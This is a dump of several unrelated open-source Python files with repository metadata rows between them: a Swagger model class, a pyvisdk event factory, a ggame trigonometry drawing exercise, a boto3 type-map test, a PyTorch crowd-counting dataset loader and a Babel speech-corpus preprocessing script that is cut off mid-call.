if time_remaining is not None:
self.time_remaining = time_remaining
if pod is not None:
self.pod = pod
if source is not None:
self.source = source
if subtype is not None:
self.subtype = subtype
if volume_group is not None:
self.volume_group = volume_group
if requested_promotion_state is not None:
self.requested_promotion_state = requested_promotion_state
if promotion_status is not None:
self.promotion_status = promotion_status
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `Volume`".format(key))
if key == "provisioned" and value is not None:
if value > 4503599627370496:
raise ValueError("Invalid value for `provisioned`, value must be less than or equal to `4503599627370496`")
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Volume, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, Volume):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true
| true
|
1c40cf17ebef6c5aaba6a98ca4e67106f981e182
| 1,170
|
py
|
Python
|
pyvisdk/do/exit_standby_mode_failed_event.py
|
Infinidat/pyvisdk
|
f2f4e5f50da16f659ccc1d84b6a00f397fa997f8
|
[
"MIT"
] | null | null | null |
pyvisdk/do/exit_standby_mode_failed_event.py
|
Infinidat/pyvisdk
|
f2f4e5f50da16f659ccc1d84b6a00f397fa997f8
|
[
"MIT"
] | null | null | null |
pyvisdk/do/exit_standby_mode_failed_event.py
|
Infinidat/pyvisdk
|
f2f4e5f50da16f659ccc1d84b6a00f397fa997f8
|
[
"MIT"
] | null | null | null |
import logging
from pyvisdk.exceptions import InvalidArgumentError
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
def ExitStandbyModeFailedEvent(vim, *args, **kwargs):
'''This event records that the host failed to exit standby mode.'''
obj = vim.client.factory.create('{urn:vim25}ExitStandbyModeFailedEvent')
# do some validation checking...
if (len(args) + len(kwargs)) < 4:
raise IndexError('Expected at least 5 arguments got: %d' % len(args))
required = [ 'chainId', 'createdTime', 'key', 'userName' ]
optional = [ 'changeTag', 'computeResource', 'datacenter', 'ds', 'dvs',
'fullFormattedMessage', 'host', 'net', 'vm', 'dynamicProperty', 'dynamicType' ]
for name, arg in zip(required+optional, args):
setattr(obj, name, arg)
for name, value in kwargs.items():
if name in required + optional:
setattr(obj, name, value)
else:
raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
return obj
| 34.411765
| 124
| 0.610256
|
import logging
from pyvisdk.exceptions import InvalidArgumentError
| true
| true
|
1c40d1db1ec34f7d9f6f1e18ea250056b1f2eb83
| 1,822
|
py
|
Python
|
sinecosine.py
|
hackmeehan/Sine-Cosine
|
d789b48d3b8f0c6f6a5f17ae57a451100e2ef877
|
[
"MIT"
] | null | null | null |
sinecosine.py
|
hackmeehan/Sine-Cosine
|
d789b48d3b8f0c6f6a5f17ae57a451100e2ef877
|
[
"MIT"
] | null | null | null |
sinecosine.py
|
hackmeehan/Sine-Cosine
|
d789b48d3b8f0c6f6a5f17ae57a451100e2ef877
|
[
"MIT"
] | null | null | null |
"""
sinecosine.py
Author: Jack Meehan
Credit: https://www.webucator.com/blog/2015/03/python-color-constants-module/ (used for colors)
Assignment:
The sine and cosine functions are provided in the Python math library. These functions are used
to relate *angles* to *rectangular* (x,y) coordinate systems and can be very useful in computer
game design.
Unlike the last assignment using ggame`, this one will not provide any "skeleton" code to fill
in. You should use your submission for the Picture assignment
(https://github.com/HHS-IntroProgramming/Picture) as a reference for starting this assignment.
See:
https://github.com/HHS-IntroProgramming/Sine-Cosine/blob/master/README.md
for a detailed list of requirements for this assignment.
https://github.com/HHS-IntroProgramming/Standards-and-Syllabus/wiki/Displaying-Graphics
for general information on how to use ggame.
https://github.com/HHS-IntroProgramming/Standards-and-Syllabus/wiki/Programmed-Graphics
for general information on using list comprehensions to generate graphics.
http://brythonserver.github.io/ggame/
for detailed information on ggame.
"""
from ggame import App, Sprite, Color, CircleAsset, RectangleAsset, LineStyle
from math import sin, cos, radians
red = Color(0xff0000, 1.0)
purple = Color(0x9A32CD, 1.0)
blue = Color(0x0000EE, 1.0)
black = Color(0x000000, 1.0)
line = LineStyle(2, black)
xcoordinates = range( 0, 360, 10)
bluecircle = CircleAsset(6, line, blue)
yay = [Sprite(bluecircle, (x, 100+100*sin(radians(x)))) for x in xcoordinates]
redcircle = CircleAsset(6, line, red)
yay = [Sprite(redcircle, (x, 100+100*cos(radians(x)))) for x in xcoordinates]
purplecircle = CircleAsset(6, line, purple)
yay = [Sprite(purplecircle, (100+100*cos(radians(x)), 400+100*sin(radians(x)))) for x in xcoordinates]
myapp = App()
myapp.run()
| 35.72549
| 102
| 0.767838
|
from ggame import App, Sprite, Color, CircleAsset, RectangleAsset, LineStyle
from math import sin, cos, radians
red = Color(0xff0000, 1.0)
purple = Color(0x9A32CD, 1.0)
blue = Color(0x0000EE, 1.0)
black = Color(0x000000, 1.0)
line = LineStyle(2, black)
xcoordinates = range( 0, 360, 10)
bluecircle = CircleAsset(6, line, blue)
yay = [Sprite(bluecircle, (x, 100+100*sin(radians(x)))) for x in xcoordinates]
redcircle = CircleAsset(6, line, red)
yay = [Sprite(redcircle, (x, 100+100*cos(radians(x)))) for x in xcoordinates]
purplecircle = CircleAsset(6, line, purple)
yay = [Sprite(purplecircle, (100+100*cos(radians(x)), 400+100*sin(radians(x)))) for x in xcoordinates]
myapp = App()
myapp.run()
| true
| true
|
1c40d214a58bdf8e757e7e56b77ea9ba880b9678
| 679
|
py
|
Python
|
tests/type_maps/test_method_argument_map.py
|
vemel/boto3_type_annotations
|
88aa07a36f5626428c8d3878a4846d8cb667ea28
|
[
"MIT"
] | 44
|
2019-11-09T04:29:31.000Z
|
2022-02-11T10:51:41.000Z
|
tests/type_maps/test_method_argument_map.py
|
vemel/boto3_type_annotations
|
88aa07a36f5626428c8d3878a4846d8cb667ea28
|
[
"MIT"
] | 28
|
2019-11-26T23:50:19.000Z
|
2021-05-31T18:52:46.000Z
|
tests/type_maps/test_method_argument_map.py
|
vemel/boto3_type_annotations
|
88aa07a36f5626428c8d3878a4846d8cb667ea28
|
[
"MIT"
] | 3
|
2019-11-09T16:43:04.000Z
|
2019-12-20T15:05:33.000Z
|
import unittest
from mypy_boto3_builder.service_name import ServiceNameCatalog
from mypy_boto3_builder.type_maps.method_argument_map import get_method_arguments_stub
class MethodArgumentMapTestCase(unittest.TestCase):
def test_get_method_arguments_stub(self) -> None:
self.assertTrue(
get_method_arguments_stub(
ServiceNameCatalog.ec2, "Instance", "delete_tags"
)[0]
)
self.assertIsNone(
get_method_arguments_stub(ServiceNameCatalog.ec2, "Instance", "unknown")
)
self.assertIsNone(
get_method_arguments_stub(ServiceNameCatalog.ec2, "unknown", "delete_tags")
)
| 33.95
| 87
| 0.702504
|
import unittest
from mypy_boto3_builder.service_name import ServiceNameCatalog
from mypy_boto3_builder.type_maps.method_argument_map import get_method_arguments_stub
class MethodArgumentMapTestCase(unittest.TestCase):
def test_get_method_arguments_stub(self) -> None:
self.assertTrue(
get_method_arguments_stub(
ServiceNameCatalog.ec2, "Instance", "delete_tags"
)[0]
)
self.assertIsNone(
get_method_arguments_stub(ServiceNameCatalog.ec2, "Instance", "unknown")
)
self.assertIsNone(
get_method_arguments_stub(ServiceNameCatalog.ec2, "unknown", "delete_tags")
)
| true
| true
|
1c40d37e1ca0a0a32af9ab4412f2d1ddda580cdf
| 5,818
|
py
|
Python
|
my_dataset_test.py
|
TopoXLab/TopoCount
|
eb93de2bc40d4421ea39c1b80d5c4c4829f3e369
|
[
"MIT"
] | 18
|
2020-12-18T02:54:55.000Z
|
2022-02-26T01:52:22.000Z
|
my_dataset_test.py
|
TopoXLab/TopoCount
|
eb93de2bc40d4421ea39c1b80d5c4c4829f3e369
|
[
"MIT"
] | 2
|
2021-01-13T09:15:38.000Z
|
2021-03-26T08:43:43.000Z
|
my_dataset_test.py
|
TopoXLab/TopoCount
|
eb93de2bc40d4421ea39c1b80d5c4c4829f3e369
|
[
"MIT"
] | 8
|
2020-12-25T01:50:55.000Z
|
2021-06-08T05:21:48.000Z
|
from torch.utils.data import Dataset
import os
import matplotlib.pyplot as plt
import numpy as np
import torch
import cv2
from torchvision import transforms
import random
from PIL import Image
import glob
class CrowdDataset(Dataset):
'''
crowdDataset
'''
def __init__(self, img_root, gt_dot_root, split_txt_filepath=None, phase='train', aug=0, normalize=True, fixed_size=-1, max_side=-1):
'''
img_root: the root path of images.
gt_dot_root: the root path of ground-truth dot map.
phase: train or test
split_txt_filepath: text file containing list of images to include in the dataset. If none, then use all jpg images in img_root
'''
self.img_root=img_root
self.gt_dot_root=gt_dot_root
self.phase=phase
self.split_txt_filepath = split_txt_filepath
if(split_txt_filepath is None):
self.img_names=[filename for filename in os.listdir(img_root) \
if os.path.isfile(os.path.join(img_root,filename))]
else:
img_list = np.loadtxt(split_txt_filepath, dtype=str)
self.img_names=[filename + '.jpg' for filename in img_list[:,0] \
if os.path.isfile(os.path.join(img_root,filename+ '.jpg'))]
self.n_samples=len(self.img_names)
self.aug=aug
self.normalize = normalize;
self.fixed_size = fixed_size
self.max_side = max_side
print('self.aug', self.aug)
print('self.fixed_size', self.fixed_size)
def __len__(self):
return self.n_samples
def __getitem__(self,index):
assert index <= len(self), 'index range error'
img_name=self.img_names[index]
img=plt.imread(os.path.join(self.img_root,img_name))/255# convert from [0,255] to [0,1]
if len(img.shape)==2: # expand grayscale image to three channel.
img=img[:,:,np.newaxis]
img=np.concatenate((img,img,img),2)
img=img[:,:,0:3]
gtdot_path = os.path.join(self.gt_dot_root,img_name.replace('.jpg','_gt_dots.npy'));
if(os.path.isfile(gtdot_path)):
gt_dot=np.load(gtdot_path)
else:
gtdot_path = os.path.join(self.gt_dot_root,img_name.replace('.jpg','.npy'));
if(os.path.isfile(gtdot_path)):
gt_dot=np.load(gtdot_path)
else:
gt_dot=np.zeros((img.shape[0], img.shape[1]))
if random.randint(0,1)==1 and self.phase=='train':
img=img[:,::-1].copy() # horizontal flip
gt_dot=gt_dot[:,::-1].copy() # horizontal flip
if(self.phase=='train' and self.max_side > 0):
h = img.shape[0]
w = img.shape[1]
h2 = h
w2 = w
crop = False
if(h > self.max_side):
h2 = self.max_side
crop = True
if(w > self.max_side):
w2 = self.max_side
crop = True
if(crop):
y=0
x=0
if(not (h2 ==h)):
y = np.random.randint(0, high = h-h2)
if(not (w2 ==w)):
x = np.random.randint(0, high = w-w2)
img = img[y:y+h2, x:x+w2, :]
gt_dot = gt_dot[y:y+h2, x:x+w2]
if ((self.aug > 0 and self.phase=='train')or (self.fixed_size > 0)):
i = -1
img_pil = Image.fromarray(img.astype(np.uint8)*255);
if(self.fixed_size < 0):
i, j, h, w = transforms.RandomCrop.get_params(img_pil, output_size=(img.shape[0]//4, img.shape[1]//4))
elif(self.fixed_size < img.shape[0] or self.fixed_size < img.shape[1]):
i, j, h, w = transforms.RandomCrop.get_params(img_pil, output_size=(min(self.fixed_size,img.shape[0]), min(self.fixed_size,img.shape[1])))
#print('i, j, h, w',i, j, h, w)
if(i >= 0):
img = img[i:i+h, j:j+w, :]
gt_dot = gt_dot[i:i+h, j:j+w]
max_scale = 16
if max_scale>1: # fix image and gt to match model.
#ds_rows=int(img.shape[0]//max_scale)*max_scale
#ds_cols=int(img.shape[1]//max_scale)*max_scale
#img = img[:ds_rows, :ds_cols, :]
#gt_dmap = gt_dmap[:ds_rows, :ds_cols]
#gt_dot = gt_dot[:ds_rows, :ds_cols]
ds_rows=int(img.shape[0]//max_scale)*max_scale
ds_cols=int(img.shape[1]//max_scale)*max_scale
pad_y1 = 0
pad_y2 = 0
pad_x1 = 0
pad_x2 = 0
if(ds_rows < img.shape[0]):
pad_y1 = (max_scale - (img.shape[0] - ds_rows))//2
pad_y2 = (max_scale - (img.shape[0] - ds_rows)) - pad_y1
if(ds_cols < img.shape[1]):
pad_x1 = (max_scale - (img.shape[1] - ds_cols))//2
pad_x2 = (max_scale - (img.shape[1] - ds_cols)) - pad_x1
img = np.pad(img, ((pad_y1,pad_y2),(pad_x1,pad_x2),(0,0)), 'constant', constant_values=(1,) )# padding constant differs by dataset based on bg color
gt_dot = np.pad(gt_dot, ((pad_y1,pad_y2),(pad_x1,pad_x2)), 'constant', constant_values=(0,) )# padding constant differs by dataset based on bg color
gt_dot=gt_dot[np.newaxis,:,:]
gt_dot_tensor=torch.tensor(gt_dot,dtype=torch.float)
img=img.transpose((2,0,1)) # convert to order (channel,rows,cols)
img_tensor=torch.tensor(img,dtype=torch.float)
if(self.normalize):
img_tensor=transforms.functional.normalize(img_tensor,mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
return img_tensor,gt_dot_tensor,img_name
| 40.124138
| 160
| 0.554486
|
from torch.utils.data import Dataset
import os
import matplotlib.pyplot as plt
import numpy as np
import torch
import cv2
from torchvision import transforms
import random
from PIL import Image
import glob
class CrowdDataset(Dataset):
def __init__(self, img_root, gt_dot_root, split_txt_filepath=None, phase='train', aug=0, normalize=True, fixed_size=-1, max_side=-1):
self.img_root=img_root
self.gt_dot_root=gt_dot_root
self.phase=phase
self.split_txt_filepath = split_txt_filepath
if(split_txt_filepath is None):
self.img_names=[filename for filename in os.listdir(img_root) \
if os.path.isfile(os.path.join(img_root,filename))]
else:
img_list = np.loadtxt(split_txt_filepath, dtype=str)
self.img_names=[filename + '.jpg' for filename in img_list[:,0] \
if os.path.isfile(os.path.join(img_root,filename+ '.jpg'))]
self.n_samples=len(self.img_names)
self.aug=aug
self.normalize = normalize;
self.fixed_size = fixed_size
self.max_side = max_side
print('self.aug', self.aug)
print('self.fixed_size', self.fixed_size)
def __len__(self):
return self.n_samples
def __getitem__(self,index):
assert index <= len(self), 'index range error'
img_name=self.img_names[index]
img=plt.imread(os.path.join(self.img_root,img_name))/255
if len(img.shape)==2:
img=img[:,:,np.newaxis]
img=np.concatenate((img,img,img),2)
img=img[:,:,0:3]
gtdot_path = os.path.join(self.gt_dot_root,img_name.replace('.jpg','_gt_dots.npy'));
if(os.path.isfile(gtdot_path)):
gt_dot=np.load(gtdot_path)
else:
gtdot_path = os.path.join(self.gt_dot_root,img_name.replace('.jpg','.npy'));
if(os.path.isfile(gtdot_path)):
gt_dot=np.load(gtdot_path)
else:
gt_dot=np.zeros((img.shape[0], img.shape[1]))
if random.randint(0,1)==1 and self.phase=='train':
img=img[:,::-1].copy()
gt_dot=gt_dot[:,::-1].copy()
if(self.phase=='train' and self.max_side > 0):
h = img.shape[0]
w = img.shape[1]
h2 = h
w2 = w
crop = False
if(h > self.max_side):
h2 = self.max_side
crop = True
if(w > self.max_side):
w2 = self.max_side
crop = True
if(crop):
y=0
x=0
if(not (h2 ==h)):
y = np.random.randint(0, high = h-h2)
if(not (w2 ==w)):
x = np.random.randint(0, high = w-w2)
img = img[y:y+h2, x:x+w2, :]
gt_dot = gt_dot[y:y+h2, x:x+w2]
if ((self.aug > 0 and self.phase=='train')or (self.fixed_size > 0)):
i = -1
img_pil = Image.fromarray(img.astype(np.uint8)*255);
if(self.fixed_size < 0):
i, j, h, w = transforms.RandomCrop.get_params(img_pil, output_size=(img.shape[0]//4, img.shape[1]//4))
elif(self.fixed_size < img.shape[0] or self.fixed_size < img.shape[1]):
i, j, h, w = transforms.RandomCrop.get_params(img_pil, output_size=(min(self.fixed_size,img.shape[0]), min(self.fixed_size,img.shape[1])))
if(i >= 0):
img = img[i:i+h, j:j+w, :]
gt_dot = gt_dot[i:i+h, j:j+w]
max_scale = 16
if max_scale>1:
ds_rows=int(img.shape[0]//max_scale)*max_scale
ds_cols=int(img.shape[1]//max_scale)*max_scale
pad_y1 = 0
pad_y2 = 0
pad_x1 = 0
pad_x2 = 0
if(ds_rows < img.shape[0]):
pad_y1 = (max_scale - (img.shape[0] - ds_rows))//2
pad_y2 = (max_scale - (img.shape[0] - ds_rows)) - pad_y1
if(ds_cols < img.shape[1]):
pad_x1 = (max_scale - (img.shape[1] - ds_cols))//2
pad_x2 = (max_scale - (img.shape[1] - ds_cols)) - pad_x1
img = np.pad(img, ((pad_y1,pad_y2),(pad_x1,pad_x2),(0,0)), 'constant', constant_values=(1,) )
gt_dot = np.pad(gt_dot, ((pad_y1,pad_y2),(pad_x1,pad_x2)), 'constant', constant_values=(0,) )
gt_dot=gt_dot[np.newaxis,:,:]
gt_dot_tensor=torch.tensor(gt_dot,dtype=torch.float)
img=img.transpose((2,0,1))
img_tensor=torch.tensor(img,dtype=torch.float)
if(self.normalize):
img_tensor=transforms.functional.normalize(img_tensor,mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
return img_tensor,gt_dot_tensor,img_name
| true
| true
|
1c40d3c29f198e1d6558e79093b5ee23ceef0f5f
| 841
|
py
|
Python
|
google/ads/google_ads/v6/services/conversion_adjustment_upload_service_client_config.py
|
jphanwebstaurant/google-ads-python
|
600812b2afcc4d57f00b47dfe436620ce50bfe9b
|
[
"Apache-2.0"
] | 1
|
2021-04-09T04:28:47.000Z
|
2021-04-09T04:28:47.000Z
|
google/ads/google_ads/v6/services/conversion_adjustment_upload_service_client_config.py
|
jphanwebstaurant/google-ads-python
|
600812b2afcc4d57f00b47dfe436620ce50bfe9b
|
[
"Apache-2.0"
] | null | null | null |
google/ads/google_ads/v6/services/conversion_adjustment_upload_service_client_config.py
|
jphanwebstaurant/google-ads-python
|
600812b2afcc4d57f00b47dfe436620ce50bfe9b
|
[
"Apache-2.0"
] | null | null | null |
config = {
"interfaces": {
"google.ads.googleads.v6.services.ConversionAdjustmentUploadService": {
"retry_codes": {
"idempotent": [
"DEADLINE_EXCEEDED",
"UNAVAILABLE"
],
"non_idempotent": []
},
"retry_params": {
"default": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
}
},
"methods": {
"UploadConversionAdjustments": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default"
}
}
}
}
}
| 26.28125
| 75
| 0.546968
|
config = {
"interfaces": {
"google.ads.googleads.v6.services.ConversionAdjustmentUploadService": {
"retry_codes": {
"idempotent": [
"DEADLINE_EXCEEDED",
"UNAVAILABLE"
],
"non_idempotent": []
},
"retry_params": {
"default": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
}
},
"methods": {
"UploadConversionAdjustments": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default"
}
}
}
}
}
| true
| true
|
1c40d4439683f1c1b8e7339dffa661baea4ea06b
| 1,182
|
py
|
Python
|
predict.py
|
guoshuhong/yolo4_SVHN
|
fb91d5c21a3ff2b6f8e977e7de5b91b1ecf3394e
|
[
"MIT"
] | null | null | null |
predict.py
|
guoshuhong/yolo4_SVHN
|
fb91d5c21a3ff2b6f8e977e7de5b91b1ecf3394e
|
[
"MIT"
] | null | null | null |
predict.py
|
guoshuhong/yolo4_SVHN
|
fb91d5c21a3ff2b6f8e977e7de5b91b1ecf3394e
|
[
"MIT"
] | null | null | null |
#-------------------------------------#
# 对单张图片进行预测
#-------------------------------------#
from yolo import YOLO
from PIL import Image
import os
import time
import pandas as pd
import numpy as np
yolo = YOLO()
while True:
filelist = os.listdir()
img = input('Input image filename:')
try:
image = Image.open(img)
except:
print('Open Error! Try again!')
continue
else:
r_image = yolo.detect_image(image)
r_image.show()
# TIANCHI
# filelist = os.listdir("mchar_test_a")
# cnt = -1
# test_label_pred = ["123"]*40000
# for img in filelist:
# try:
# image = Image.open("mchar_test_a/" + img)
# except:
# print('Open Error! Try again!')
# continue
# else:
# cnt += 1
# print(cnt)
# # if cnt == 10 :
# # break
# # r_image = yolo.detect_image(image ,test_label_pred, cnt)
# test_label_pred = yolo.detect_image(image ,test_label_pred, cnt)
# # time.sleep(2)
# # r_image.show()
df_submit = pd.read_csv('mchar_sample_submit_A.csv')
df_submit['file_code'] = test_label_pred
df_submit.to_csv('submit9-12.csv', index=None)
| 25.148936
| 74
| 0.559222
|
from yolo import YOLO
from PIL import Image
import os
import time
import pandas as pd
import numpy as np
yolo = YOLO()
while True:
filelist = os.listdir()
img = input('Input image filename:')
try:
image = Image.open(img)
except:
print('Open Error! Try again!')
continue
else:
r_image = yolo.detect_image(image)
r_image.show()
v('submit9-12.csv', index=None)
| true
| true
|
1c40d491ec9cacd474a81b295016a4c0fc79a49e
| 6,447
|
py
|
Python
|
data/babel.py
|
neural-polysynthetic-language-modelling/deepspeech.pytorch
|
7883e5be5abeacdd52aa170f85d3060ed3b11d00
|
[
"MIT"
] | null | null | null |
data/babel.py
|
neural-polysynthetic-language-modelling/deepspeech.pytorch
|
7883e5be5abeacdd52aa170f85d3060ed3b11d00
|
[
"MIT"
] | null | null | null |
data/babel.py
|
neural-polysynthetic-language-modelling/deepspeech.pytorch
|
7883e5be5abeacdd52aa170f85d3060ed3b11d00
|
[
"MIT"
] | null | null | null |
import os
import wget
import tarfile
import argparse
import csv
from multiprocessing.pool import ThreadPool
import subprocess
from utils import create_manifest
import re
from sphfile import SPHFile
parser = argparse.ArgumentParser(description='Processes downloaded IARPA babel corpus')
parser.add_argument("--target-dir", default='CommonVoice_dataset/', type=str, help="Directory to store the dataset.")
parser.add_argument("--data-dir", type=str, help="Path to the BABEL directory file ")
parser.add_argument('--sample-rate', default=16000, type=int, help='Sample rate')
parser.add_argument('--min-duration', default=1, type=int,
help='Prunes training samples shorter than the min duration (given in seconds, default 1)')
parser.add_argument('--max-duration', default=15, type=int,
help='Prunes training samples longer than the max duration (given in seconds, default 15)')
args = parser.parse_args()
def read_transcription_file(file_path, audio_file_path):
"""Read transcription files from the IARPA babel format.
Transcription files consist of the following format
[timestamp]
transcription
[timestamp]
transcription
[timestamp]
Args:
file_path: str, path to the transcription file to read.
audio_file_path: str, path to the sph file that corresponds to
the given transcription file.
Returns:
an array of dicts where the following keys are used:
'start_time', 'end_time', 'transcription', 'audio_file'
"""
with open(file_path) as in_file:
last_timestamp = 0
res = []
transcription = ""
for line in in_file:
time_stamp_match = re.match("\[([0-9\]+\.[0-9]+)\]", line)
#if this regex matched then the line is a timestamp
if time_stamp_match:
timestamp = float(time_stamp_match.group(1))
if transcription and transcription.strip() not in ['(())', "<no-speech>"]:
single_instance = {"start_time": last_timestamp,
"end_time": timestamp,
"transcription": transcription,
"audio_file" : audio_file_path}
res.append(single_instance)
last_timestamp = timestamp
else:
last_timestamp = timestamp # this handles silence at beginning
else:
transcription = line.strip()
return res
def convert_to_wav(txt_file, sph_path, target_dir):
""" Read *.csv file description, convert mp3 to wav, process text.
Save results to target_dir.
Args:
txt_file: str, path to *.txt file with data description,
usually contained in the transcription folder
target_dir: str, path to dir to save results; wav/ and txt/ dirs will be created
"""
wav_dir = os.path.join(target_dir, 'wav/')
txt_dir = os.path.join(target_dir, 'txt/')
os.makedirs(wav_dir, exist_ok=True)
os.makedirs(txt_dir, exist_ok=True)
path_to_data = os.path.dirname(txt_file)
def process(x):
file_path = x["audio_file"]
text = x["transcription"]
start_time = x["start_time"]
duration = x["end_time"] - start_time
file_name = os.path.splitext(os.path.basename(file_path))[0]
file_name = str(start_time) + "_" + str(duration) + file_name
text = text.strip().upper()
with open(os.path.join(txt_dir, file_name + '.txt'), 'w') as f:
f.write(text)
cmd = "sox -v 0.6 -t wav {} -r {} -b 16 -c 1 -t wav {} trim {} {}".format(
os.path.join(path_to_data, file_path),
args.sample_rate,
os.path.join(wav_dir, file_name + ".wav"),
start_time,
duration)
subprocess.call([cmd], shell=True)
print('Converting wav to wav for {}.'.format(txt_file))
# generate processed data
data = read_transcription_file(txt_file, sph_path)
with ThreadPool(10) as pool:
pool.map(process, data)
def main():
target_dir = args.target_dir
os.makedirs(target_dir, exist_ok=True)
target_unpacked_dir = os.path.join(target_dir, "CV_unpacked")
os.makedirs(target_unpacked_dir, exist_ok=True)
if args.data_dir and os.path.exists(args.data_dir):
print('Find existing file {}'.format(args.data_dir))
else:
raise RuntimeError("Could not find downloaded IARPA babel corpus, please download the relevant corpus from LDC")
if os.path.isdir(args.data_dir):
print("Identified unpacked IARPA dataset")
unpacked_location = args.data_dir
else:
print("Unpacking corpus to {} ...".format(target_unpacked_dir))
tar = tarfile.open(target_file)
tar.extractall(target_unpacked_dir)
tar.close()
unpacked_location = target_unpacked_dir
path_flattened = re.sub(r"[\/]", "_", os.path.splitext(args.data_dir)[0])
os.makedirs(os.path.join(target_dir, path_flattened), exist_ok=True)
roots = {}
# collect all the filepaths
for root, dirs, files in os.walk(unpacked_location):
roots[root] = files
audio_trans_pairs = [] # this is a list of tuples
for root in roots:
# find all the audio directories
if re.search(r"/audio", root):
transcription_root = re.sub(r"/audio", "/transcription", root)
print(transcription_root)
for fp in roots[root]:
txt_fp = re.sub(r"\.wav", ".txt", fp)
if os.path.exists(os.path.join(transcription_root, txt_fp)):
pair_tuple = (os.path.join(transcription_root, txt_fp),
os.path.join(root, fp))
audio_trans_pairs.append(pair_tuple)
for txt_path, audio_path in audio_trans_pairs:
convert_to_wav(txt_path,
audio_path,
os.path.join(target_dir,path_flattened))
# make a separate manifest for each
print('Creating manifests...')
create_manifest(os.path.join(target_dir,path_flattened),
path_flattened + '_manifest.csv',
args.min_duration,
args.max_duration)
if __name__ == "__main__":
main()
| 40.54717
| 120
| 0.614549
|
import os
import wget
import tarfile
import argparse
import csv
from multiprocessing.pool import ThreadPool
import subprocess
from utils import create_manifest
import re
from sphfile import SPHFile
parser = argparse.ArgumentParser(description='Processes downloaded IARPA babel corpus')
parser.add_argument("--target-dir", default='CommonVoice_dataset/', type=str, help="Directory to store the dataset.")
parser.add_argument("--data-dir", type=str, help="Path to the BABEL directory file ")
parser.add_argument('--sample-rate', default=16000, type=int, help='Sample rate')
parser.add_argument('--min-duration', default=1, type=int,
help='Prunes training samples shorter than the min duration (given in seconds, default 1)')
parser.add_argument('--max-duration', default=15, type=int,
help='Prunes training samples longer than the max duration (given in seconds, default 15)')
args = parser.parse_args()
def read_transcription_file(file_path, audio_file_path):
with open(file_path) as in_file:
last_timestamp = 0
res = []
transcription = ""
for line in in_file:
time_stamp_match = re.match("\[([0-9\]+\.[0-9]+)\]", line)
if time_stamp_match:
timestamp = float(time_stamp_match.group(1))
if transcription and transcription.strip() not in ['(())', "<no-speech>"]:
single_instance = {"start_time": last_timestamp,
"end_time": timestamp,
"transcription": transcription,
"audio_file" : audio_file_path}
res.append(single_instance)
last_timestamp = timestamp
else:
last_timestamp = timestamp
else:
transcription = line.strip()
return res
def convert_to_wav(txt_file, sph_path, target_dir):
wav_dir = os.path.join(target_dir, 'wav/')
txt_dir = os.path.join(target_dir, 'txt/')
os.makedirs(wav_dir, exist_ok=True)
os.makedirs(txt_dir, exist_ok=True)
path_to_data = os.path.dirname(txt_file)
def process(x):
file_path = x["audio_file"]
text = x["transcription"]
start_time = x["start_time"]
duration = x["end_time"] - start_time
file_name = os.path.splitext(os.path.basename(file_path))[0]
file_name = str(start_time) + "_" + str(duration) + file_name
text = text.strip().upper()
with open(os.path.join(txt_dir, file_name + '.txt'), 'w') as f:
f.write(text)
cmd = "sox -v 0.6 -t wav {} -r {} -b 16 -c 1 -t wav {} trim {} {}".format(
os.path.join(path_to_data, file_path),
args.sample_rate,
os.path.join(wav_dir, file_name + ".wav"),
start_time,
duration)
subprocess.call([cmd], shell=True)
print('Converting wav to wav for {}.'.format(txt_file))
data = read_transcription_file(txt_file, sph_path)
with ThreadPool(10) as pool:
pool.map(process, data)
def main():
target_dir = args.target_dir
os.makedirs(target_dir, exist_ok=True)
target_unpacked_dir = os.path.join(target_dir, "CV_unpacked")
os.makedirs(target_unpacked_dir, exist_ok=True)
if args.data_dir and os.path.exists(args.data_dir):
print('Find existing file {}'.format(args.data_dir))
else:
raise RuntimeError("Could not find downloaded IARPA babel corpus, please download the relevant corpus from LDC")
if os.path.isdir(args.data_dir):
print("Identified unpacked IARPA dataset")
unpacked_location = args.data_dir
else:
print("Unpacking corpus to {} ...".format(target_unpacked_dir))
tar = tarfile.open(target_file)
tar.extractall(target_unpacked_dir)
tar.close()
unpacked_location = target_unpacked_dir
path_flattened = re.sub(r"[\/]", "_", os.path.splitext(args.data_dir)[0])
os.makedirs(os.path.join(target_dir, path_flattened), exist_ok=True)
roots = {}
for root, dirs, files in os.walk(unpacked_location):
roots[root] = files
audio_trans_pairs = []
for root in roots:
if re.search(r"/audio", root):
transcription_root = re.sub(r"/audio", "/transcription", root)
print(transcription_root)
for fp in roots[root]:
txt_fp = re.sub(r"\.wav", ".txt", fp)
if os.path.exists(os.path.join(transcription_root, txt_fp)):
pair_tuple = (os.path.join(transcription_root, txt_fp),
os.path.join(root, fp))
audio_trans_pairs.append(pair_tuple)
for txt_path, audio_path in audio_trans_pairs:
convert_to_wav(txt_path,
audio_path,
os.path.join(target_dir,path_flattened))
print('Creating manifests...')
create_manifest(os.path.join(target_dir,path_flattened),
